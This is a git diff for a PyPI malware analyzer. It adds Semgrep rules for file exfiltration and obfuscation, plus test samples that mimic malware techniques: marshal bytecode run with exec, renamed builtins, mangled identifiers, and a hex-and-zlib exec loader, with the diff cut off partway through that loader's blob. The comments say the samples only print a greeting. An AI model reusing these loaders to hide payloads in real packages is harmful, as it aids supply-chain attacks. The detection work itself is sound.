+ + # file exfiltration + - patterns: + - pattern: open($FILE, $MODE) + - metavariable-regex: + metavariable: $MODE + regex: r|rt|r+|w+|rb|r+b|w+b|a+|a+b + - patterns: + - pattern: os.open($FILE, $MODE) + - metavariable-regex: + metavariable: $MODE + regex: os\.O_RDONLY|os\.O_RDWR pattern-sinks: - pattern-either: diff --git a/src/macaron/resources/pypi_malware_rules/obfuscation.yaml b/src/macaron/resources/pypi_malware_rules/obfuscation.yaml index 5f3bf329c..76b327578 100644 --- a/src/macaron/resources/pypi_malware_rules/obfuscation.yaml +++ b/src/macaron/resources/pypi_malware_rules/obfuscation.yaml @@ -67,31 +67,26 @@ rules: - pattern: __import__('__pyarmor__') # pyarmor RTF mode: pyarmor.readthedocs.io/en/latest/tutorial/advanced.html - pattern: __assert_armored__($PAYLOAD) - - patterns: - - pattern: | - def $FUNC_NAME(...): - ... - - metavariable-regex: - metavariable: $FUNC_NAME - regex: ^pyarmor__\d+$ # inline pyarmor marker: pyarmor.readthedocs.io/en/latest/tutorial/advanced.html - - pattern-regex: ^# pyarmor:.? + - pattern-regex: ^\s*#\s*pyarmor:.* # obfuscated names using pyob.oxyry.com with O, o, 0 or github.com/QQuick/Opy and pyobfuscate using l, I, 1 - patterns: - - pattern: | - def $OBF(...): - ... - - pattern: | - class $OBF(...): - ... - - pattern: $OBF = ... + - pattern-either: + - pattern: | + def $OBF(...): + ... + - pattern: | + class $OBF(...): + ... + - pattern: $OBF = ... - metavariable-regex: metavariable: $OBF - regex: (^_?[Oo0]|[1Il]+$) + regex: (^_*([lI1_]{5,}|[Oo0_]{5,})_*$)|(^pyarmor_*\d+$) # obfuscated using pyobfuscate.com - pattern: pyobfuscate=... # obfuscated using liftoff.github.io/pyminifier - pattern: import mystificate + - pattern: import demiurgic - id: inline-imports metadata: @@ -134,9 +129,10 @@ rules: - pattern: bytes.fromhex(...) # unicode construction - patterns: - - pattern: $STRING.join(map($FOO, [...])) - - pattern: $STRING.join($FOO($VAL) for $VAL in [...]) - - pattern: $STRING.join($FOO($VAL) for $VAL in $GEN(...)) + - pattern-either: + - pattern: $STRING.join(map($FOO, [...])) + - pattern: $STRING.join($FOO($VAL) for $VAL in [...]) + - pattern: $STRING.join($FOO($VAL) for $VAL in $GEN(...)) - metavariable-regex: metavariable: $FOO regex: unicode|unichr|chr|ord diff --git a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py index b7d54e72a..9c99b8062 100644 --- a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py +++ b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py @@ -116,7 +116,7 @@ def analyze_source(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[Heuri logger.debug("Instantiating %s", PyPISourcecodeAnalyzer.__name__) try: sourcecode_analyzer = PyPISourcecodeAnalyzer() - return sourcecode_analyzer.analyze_patterns(pypi_package_json) + return sourcecode_analyzer.analyze(pypi_package_json) except (ConfigurationError, HeuristicAnalyzerValueError) as source_code_error: logger.debug("Unable to perform source code analysis: %s", source_code_error) return HeuristicResult.SKIP, {} diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py new file mode 100644 index 000000000..74ce85c19 --- /dev/null +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py @@ -0,0 +1,26 @@ +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +""" +Running this code will not produce any malicious behavior, but code isolation measures are +in place for safety. +""" + +import sys + +# ensure no symbols are exported so this code cannot accidentally be used +__all__ = [] +sys.exit() + +def test_function(): + """ + All code to be tested will be defined inside this function, so it is all local to it. This is + to isolate the code to be tested, as it exists to replicate the patterns present in malware + samples. + """ + sys.exit() + # marshal encryption from pyobfuscate.com/marshal-encrypt, script is just print("Hello world!") + + from marshal import loads + bytecode = loads(b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00@\x00\x00\x00s\x0c\x00\x00\x00e\x00d\x00\x83\x01\x01\x00d\x01S\x00)\x02z\x0cHello world!N)\x01\xda\x05print\xa9\x00r\x02\x00\x00\x00r\x02\x00\x00\x00\xfa\x08\xda\x08\x01\x00\x00\x00\xf3\x00\x00\x00\x00') + exec(bytecode) diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py new file mode 100644 index 000000000..ed2c9dda9 --- /dev/null +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py @@ -0,0 +1,61 @@ +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +""" +Running this code will not produce any malicious behavior, but code isolation measures are +in place for safety. +""" + +import sys + +# ensure no symbols are exported so this code cannot accidentally be used +__all__ = [] +sys.exit() + +def test_function(): + """ + All code to be tested will be defined inside this function, so it is all local to it. This is + to isolate the code to be tested, as it exists to replicate the patterns present in malware + samples. + """ + sys.exit() + import builtins + _ = __import__ + _ = getattr + _ = bytes + _ = bytearray + _ = exec + _ = eval + _ = setattr + _ = compile + _ = map + _ = open + _ = zip + _ = vars + _ = dir + _ = builtins.__import__ + _ = builtins.getattr + _ = builtins.bytes + _ = builtins.bytearray + _ = builtins.exec + _ = builtins.eval + _ = builtins.setattr + _ = builtins.compile + _ = builtins.map + _ = builtins.open + _ = builtins.zip + _ = builtins.vars + _ = builtins.dir + _ = __import__('builtins').__import__ + _ = __import__('builtins').getattr + _ = __import__('builtins').bytes + _ = __import__('builtins').bytearray + _ = __import__('builtins').exec + _ = __import__('builtins').eval + _ = __import__('builtins').setattr + _ = __import__('builtins').compile + _ = __import__('builtins').builtins.map + _ = __import__('builtins').open + _ = __import__('builtins').zip + _ = __import__('builtins').vars + _ = __import__('builtins').dir diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json new file mode 100644 index 000000000..3376aa3ed --- /dev/null +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json @@ -0,0 +1,405 @@ +{ + "src.macaron.resources.pypi_malware_rules.decode-and-execute": [ + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py", + "start": 26, + "end": 26 + } + ], + "src.macaron.resources.pypi_malware_rules.default-assigning": [ + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 23, + "end": 23 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 24, + "end": 24 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 25, + "end": 25 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 26, + "end": 26 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 27, + "end": 27 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 28, + "end": 28 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 29, + "end": 29 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 30, + "end": 30 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 31, + "end": 31 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 32, + "end": 32 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 33, + "end": 33 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 34, + "end": 34 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 35, + "end": 35 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 36, + "end": 36 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 37, + "end": 37 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 38, + "end": 38 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 39, + "end": 39 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 40, + "end": 40 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 41, + "end": 41 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 42, + "end": 42 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 43, + "end": 43 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 44, + "end": 44 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 45, + "end": 45 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 46, + "end": 46 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 47, + "end": 47 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 48, + "end": 48 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 49, + "end": 49 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 50, + "end": 50 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 51, + "end": 51 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 52, + "end": 52 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 53, + "end": 53 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 54, + "end": 54 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 55, + "end": 55 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 56, + "end": 56 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 57, + "end": 57 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 58, + "end": 58 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 59, + "end": 59 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 60, + "end": 60 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 61, + "end": 61 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "start": 68, + "end": 68 + } + ], + "src.macaron.resources.pypi_malware_rules.inline-imports": [ + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 49, + "end": 49 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 50, + "end": 50 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 51, + "end": 51 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 52, + "end": 52 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 53, + "end": 53 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 54, + "end": 54 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 55, + "end": 55 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 56, + "end": 56 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 57, + "end": 57 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 58, + "end": 58 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 59, + "end": 59 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 60, + "end": 60 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "start": 61, + "end": 61 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "start": 69, + "end": 69 + } + ], + "src.macaron.resources.pypi_malware_rules.obfuscation-tools": [ + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "start": 23, + "end": 23 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "start": 25, + "end": 31 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "start": 26, + "end": 26 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "start": 27, + "end": 27 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "start": 28, + "end": 28 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "start": 30, + "end": 31 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "start": 33, + "end": 33 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "start": 37, + "end": 37 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "start": 39, + "end": 45 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "start": 40, + "end": 40 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "start": 41, + "end": 41 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "start": 42, + "end": 42 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "start": 44, + "end": 45 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "start": 47, + "end": 47 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "start": 51, + "end": 51 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "start": 53, + "end": 59 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "start": 54, + "end": 54 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "start": 55, + "end": 55 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "start": 56, + "end": 56 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "start": 58, + "end": 59 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "start": 61, + "end": 61 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "start": 65, + "end": 65 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "start": 68, + "end": 68 + }, + { + "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "start": 68, + "end": 68 + } + ] +} diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py new file mode 100644 index 000000000..270f88600 --- /dev/null +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py @@ -0,0 +1,69 @@ +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +""" +Running this code will not produce any malicious behavior, but code isolation measures are +in place for safety. +""" + +import sys + +# ensure no symbols are exported so this code cannot accidentally be used +__all__ = [] +sys.exit() + +def test_function(): + """ + All code to be tested will be defined inside this function, so it is all local to it. This is + to isolate the code to be tested, as it exists to replicate the patterns present in malware + samples. + """ + sys.exit() + # using pyobfuscate.com/rename-obf to rename items, code is a class that has one method that prints Hello world! + lllllllllllllll, llllllllllllllI = __name__, print + + class lIIlIIIIIIIlIlllIl: + IIlIllIIlllIlIlIll = 'Hello' + IlIIlIIIlIllIIlIIl = 'world' + IIlIlIlIIIIlIIlIlI = '!' + + def IIlIlIIIIlIlIlIIll(IIIlIlIIllllIlIlll): + llllllllllllllI(f'{IIIlIlIIllllIlIlll.IIlIllIIlllIlIlIll} {IIIlIlIIllllIlIlll.IlIIlIIIlIllIIlIIl}{IIIlIlIIllllIlIlll.IIlIlIlIIIIlIIlIlI}') + if lllllllllllllll == '__main__': + llIlIIIllIIIIlIlll = lIIlIIIIIIIlIlllIl() + llIlIIIllIIIIlIlll.IIlIlIIIIlIlIlIIll() + + # using using pyob.oxyry.com's naming convention + __O0O00O00O0OOOOO0O, __OO00000OOOO000OO0 = __name__, print + + class OO0OO0OOO0OOOO000: + OO000OOOOO00O0OOO = 'Hello' + OOO0O00O00000O0O0 = 'world' + OOOOO0O000O0O000O = '!' + + def OOOOOO000OOO0O0O0(O00O00O0O00O000O0): + __OO00000OOOO000OO0(f'{O00O00O0O00O000O0.OO000OOOOO00O0OOO} {O00O00O0O00O000O0.OOO0O00O00000O0O0}{O00O00O0O00O000O0.OOOOO0O000O0O000O}') + if __O0O00O00O0OOOOO0O == '__main__': + __OO00000O00OOOO0OO = OO0OO0OOO0OOOO000() + __OO00000O00OOOO0OO.OOOOOO000OOO0O0O0() + + # using pyarmor's RTF mode naming convention + pyarmor__12, pyarmor__14 = __name__, print + + class pyarmor__16: + pyarmor__18 = 'Hello' + pyarmor__0 = 'world' + pyarmor__8 = '!' + + def pyarmor__24(pyarmor__60): + pyarmor__14(f'{pyarmor__60.pyarmor__18} {pyarmor__60.pyarmor__0}{pyarmor__60.pyarmor__8}') + if pyarmor__12 == '__main__': + pyarmor__2 = pyarmor__16() + pyarmor__2.pyarmor__24() + + # inline pyarmor marker + # pyarmor: print('this script is obfuscated') + + # obfuscated using pyobfuscate.com/pyd's AES 256-bit encryption + pyobfuscate=(lambda getattr:[((lambda IIlII,IlIIl:setattr(__builtins__,IIlII,IlIIl))(IIlII,IlIIl)) for IIlII,IlIIl in getattr.items()]);Il=chr(114)+chr(101);lI=r'[^a-zA-Z0-9]';lIl=chr(115)+chr(117)+chr(98);lllllllllllllll, llllllllllllllI, lllllllllllllIl,lllllllllIIllIIlI = __import__, getattr, bytes,exec + __import__("sys").setrecursionlimit(100000000);lllllllllIIllIIlI(llllllllllllllI(lllllllllllllll(lllllllllllllIl.fromhex('7a6c6962').decode()), lllllllllllllIl.fromhex('6465636f6d7072657373').decode())(lllllllllllllIl.fromhex('789ced1ded6edb38f2557cbf22b559c1f737455e615f20300437717b069cb8485cec2e0ef7ee2759964491f3c90f597224140b9543cef70c6748b95b96f5f378d8be7e7fd9aeca87d33fbf76d99732ff56aecbc78fd3fbb7f2f23cbeec9f4fd5683775fd50ae8bb27c3ebeeccab2783e96dbf79fcfc7df6fa7f392c73f8f6fbbea6dfd58ae1b1c8f0d9eeca9c29ce5f7d59f167556c1d65983f7a15a5243fa918a52f5f79ada79c500500fe69b8ad9f2f169736195a2033fa648e7a7306617c822674276561db928cbeba752efba67ca62c2e400a67759e960e86d58affeb9eb665a04feb3fbfb1e18ae6c7d6f68a25179cf8b561bcc70d928e3a9056ebe7ae2ef703d652dfccb97f6ed6bb7240f2090197caa191d7006b15671e6ab5b9bb50e79ee25ec10599e354ee07a6af300feaa8e1867fec0271eda974eae40233276c89b5411413015d9388ec9a2e9c32383228566323767d253c1e8cbfd3c522fe5a89660fc772ccb926c991c6db0582eeddde36dfbdaef1f6d40fc381cb72710433be3e7e1f87d7bf870e7b413f6a7dd3bca439c6dd8021ad2fb99231c438b854d3fc364dbeaec690369ccdea9d78f55ddb38675db627a3ebefe3af4bbffd0e4cf87edc7c7d9e67d02fcb13f746ed08efef77ff736de5fc7bfee873c3dfcdc9db6a7d33b659baccab74f04bc99044ec80671e66d9750349874839853236dcbbcd8bc4517364c4c185df20cdd533bd3eb6a8ca924ff44ae5de510a7921bc6ffcbfeddee18cc59565fd2da6988b39d7b7c7fb9a71004158a4d13756efabc115ac054dd43a4d225298f00aff556a443953d6d545e9b653e55a4b85cedc73c0acfe00ddf4010905ece1a0d4c87bdc3085eaea0a98858b498e279a0bc89d23be320aed2679036a7b6676818a58caedbcc53b7c218cd2e141261778be27eceb241c4de20ec72823fbf6cb08c76fa103d18977c776bf94e7166e6229abb6e3a708a236d1feee225c31ad31f1d78035c7798874c59776e32c9d41b642b1c57b08dae6d645141c3edfbf076e40ea5e93de43919cc210af472e1f4fb2b91dfa0dd0fe0ba2ade18b2c16503c12c5660286f37e4b21a2b914b5c23374108dcf2d7a6dcc910a837777158dd14eb56246ceb362b1c7d5994e7c0317dbda1640643598e74d836c717dfb79224e638eb0e47a58cfd0f22bd3199af6eb2d61bc291ea63b6dde163677077666b9d886c470f02d5c01fc7f7b302f66f75f3919b370e5cd3c1160b0f46b510ff50c5f00977b139c3f856a5bffe299b3c70ae51065aa995d168a5b9a8af15d3b17ef6963cdf40df74148d104543d272caccf0315349608aab8611a7a7531f84ed2c7cd7554eae9dece619e12f6612e0b1c7276d2e908dd6b98ee3b8e968d0740d813d3e56b248b92fcc8e0cdf55f8b943fba22808e07b0d963a8094f345bd079a7b31f2c10acd1d5662912a91577ec3fb628eab0e5782161bff1081e38ad395108c38577d0c9aec1034ddf9eae3652caf37f084fcdb4f5a79c86c12ebb4519979049c091923f3879d490484bba521d9449d88635a0a103e4641e0a1b9880d89f169d7f5124bd8698a3eb12b542ededb0066f9649762bf10947d91e48f9f9c1869838c91bb5f31a6bb4fe424ed188c5d3c71843df21dad58a7a8948b0e08c416bdfa3531a350dc86c99aafa4bbf5c5e327e0e3ce8b321b246d8a74fe116fe7153a008d589c30f515c1d56ae7160cb5fec12d6fc43a35042cda84476ebbc58a715fc2ba5acf5d83c87983275d599b62b3c53a8564dd8cead39708a9d20547a8e9e36da481d93376334c6aab5bdbbafd355d9de4cfa78232a40bed92c33dcc233b46389c8f2e7460ef40a25166e694c78063ec65fefb7a4f2aec0aca5dece9a9aeec4adff1898ea8d54bac33b4de49af7a18d6c1639d09191286e5b274d5accb3551080579b9e025fd711576206c97af57dcd23bee8917d63126d7e13a1de10855751093ba3dc57d11745f89cbbba1575ff152ae9b203e4c135e4b8ce74a148fe4a5479ae336774d408f1fa7750cb8f6080c54f89f4998d0415ae86d162fcdf0f7bdd1bba69e57a53dbd0aec906fbcd2b520ad9fcda142f5edf6253c744812ddce881928553575ea8226ecaa5d73a5dbe7bb6bba62c7a4e645549886e849b427a708338f1d3bced6a966355483e0763bc5db4e9fb649204bacab2aed098a4b3566de1dedf4cc7f73d7ab0af4d5ebb96afab396511d324eea897cbc19a28098a72a486c26687426518f462d0113da3d6e4e0c3d115688ea187fb2f7386a170fb6b977b773c5eec1f74220fcdc3530a84d47bcfe114bb22633c6cdcb68ff6496f6a346da4d94aa8cd9faf67ab0f2dde4be919717bceee2d0ebe20e4fd4afeac38af44437d2f8575971afd1340df0668493c0321dfa712e85da9fed151740f3dfafdddfcda74021672001c2715ea0b70074408cbe4020ae460782a337392194afa0c54150b5c0f361d695540124d61033a3b0a0f6df07b3796a281663ba0b221d4aeb3d2acd721251e62078ee40851b0dc600171c61b1414ac9d181514ecdb7009935c9a9a4b332cc00c2a8d0818924818f1b1a45782d7a8773c881fe86e862305799300937c391396cd0080b4b1a96c72105c239006a85b354ca2a91e630230bb91aaa9f94873437c60b665e3a91810b7bf258ead56c8ba486344e8213004d66a37627b94b6da2b83b78953300c8e552538ab48b2016c9fc2ee1159509cf78ea3d51babd312a77025e610b63d0cda45205b8590411570b506a8ddcf8a9bc8b8258a589799339ea27f03ab555b59afbb47e0c5b5cd3c675624853b6af401c046242ca326137dec524ce230e2c5554201cd8eb901211a218da0542a0ae301304180a7415684de3538f5d1be1b3157641b55798a491ac07d45ceaadc72e93f5540dcc1c75649ccd17d59ff4dfc7253fdd64c2ec4680449e411049f72f18a2c878f82252589c840630857ce362e1e5472d042f91548710b5a1f023d509ca3cc5381f69239cb2b30ccd3bb8290004c272545e6b24109d630ede16780713217297f031e9d57e58831aebb876651792de73b56681095d4a5f62b640fb83c171e30eb7f4bbacc45efd2e44455cbbceb56ca5d04daef8bcb5b29550fe721f3f84ba296c18843203c019bdf4dad6fcea51a16659ed68c4a0b9e280d73f6a83add64fb5087ae150734a7160af1b8847535c8ed84a4d40077a168d786e85a13528090b1850481682becc00d29771da28c1e6cb8d898d7d02875b3a1156629f4e04a3ae3b48ef9e59b52644fcde101088a409b42376e4f99454444de8557ff1992b415501a7db525a6811e37245d2a27060dfaf1387bc8afd0b654864735c75586af6def5681cd24053188291c672cff4bfd31be5275ae3fdc3d2cbad6e14e054f723922c9b0974e53704b8b1cd080b8ee55657eb9bce3234efe0a6001078ef5db0932cb7ba43c6956967686fb175a8e24619981440a9b5e553668ee004bc6e39506125f6f3e3a0bbdd1997af1dcee9d49a4b093be471296135de8e05c852c2e2e0b0682a4897e5141016648848323a30ca19c60369a758d9c3f3330e944d6c5eb4b46cc700a8b814499bdaa597df95a6288bad41690a820d37cb2256b53561beaccea1ced827f0b5a5056325f6fd35a9b67ae3b4aeae5d18edc0c30002a1f524f9be194d51de79fdd88ffb91df7014bf33f1206d52e0bc091d66dca8703f9018ed0a6c6c62e3d01a557db33e87f1eac3e60574403e197c39839942cf49c98805c77206a3148a64de60c4c18ea627dc62132f6308aaea109c5fd3610d6aac73332d0213e194bec46c81f60783e3c61d6ee9725989f52e0cdadaf3a3edf333bf729708e21b0202e134ed3a575